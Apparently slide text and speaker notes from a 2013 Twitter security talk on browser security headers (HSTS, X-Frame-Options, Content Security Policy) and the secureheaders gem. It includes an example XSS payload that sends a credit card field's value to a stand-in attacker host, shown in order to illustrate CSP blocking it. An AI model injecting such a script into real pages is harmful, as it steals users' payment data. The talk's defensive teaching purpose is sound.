Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the application
Hello AppSec USA. My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
Talk about http basic authorization
Many of these headers not encourage best practices while providing a better user experience and saving resources
Take a survey
save resources since nothing is framed
Twitter has had clickjacking problems in the past. While xfo does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
hsts preload and max-age
Explain how redirecting to https doesn’t protect the initial request Save round trip
A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful xss attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and a by a variety of one-off methods.
strings or hashes
Yeah, some browsers protect you, but not all support it
Content security policy defines what can "run" on a page and any deviation creates an alert. And Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed-content by leveraging the reports sent to us by the users' browsers. This compliments the static and dynamic analysis provided by brakeman and phantom-gang in a unique way as we are receiving information from the user. We send the CSP reports to a central scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to hadoop file system which we can run "big data" reports against using pig/scalding. We send this information to SADB where we can search and sort more easily.
2013: OC Rails Jan - SecureHeaders library and content security policy
B Not your typical Rails security talk Header use @ Twitter @ocrails January 30, 2013 @ocrails | @ndm
OK, but what are browser headersAuthorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==Accept: text/plainContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101Firefox/12.0 @ocrails | @ndm
How hard is it to use?Base CaseStrict-transport-security: max-age=10000000Do all of your subdomains support SSL?Strict-transport-security: max-age=10000000; includeSubdomains(SSL FOR DUMMIES PICTURE) @ocrails | @ndm
Content secur-a-wat?Content security policy is reshaping the security modelIt is a complicated spec with great differences across browsersIt is not widely adoptedHowever,It completely eliminates reflected and stored XSSIt ensures that you never load mixed contentIt can protect users with infected browsersIt allows you to accept arbitrary html code from users @ocrails | @ndm
QuickTime™ and a H.264 decompressor are needed to see this picture.@owaspoc Jan 2013@ndm | @presidentbeef
But I have to...OK, then I’ll inject:<script> var image = new Image(); image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();</script>FALSE! img-src violation, no XHR allowed @owaspoc Jan 2013 @ndm | @presidentbeef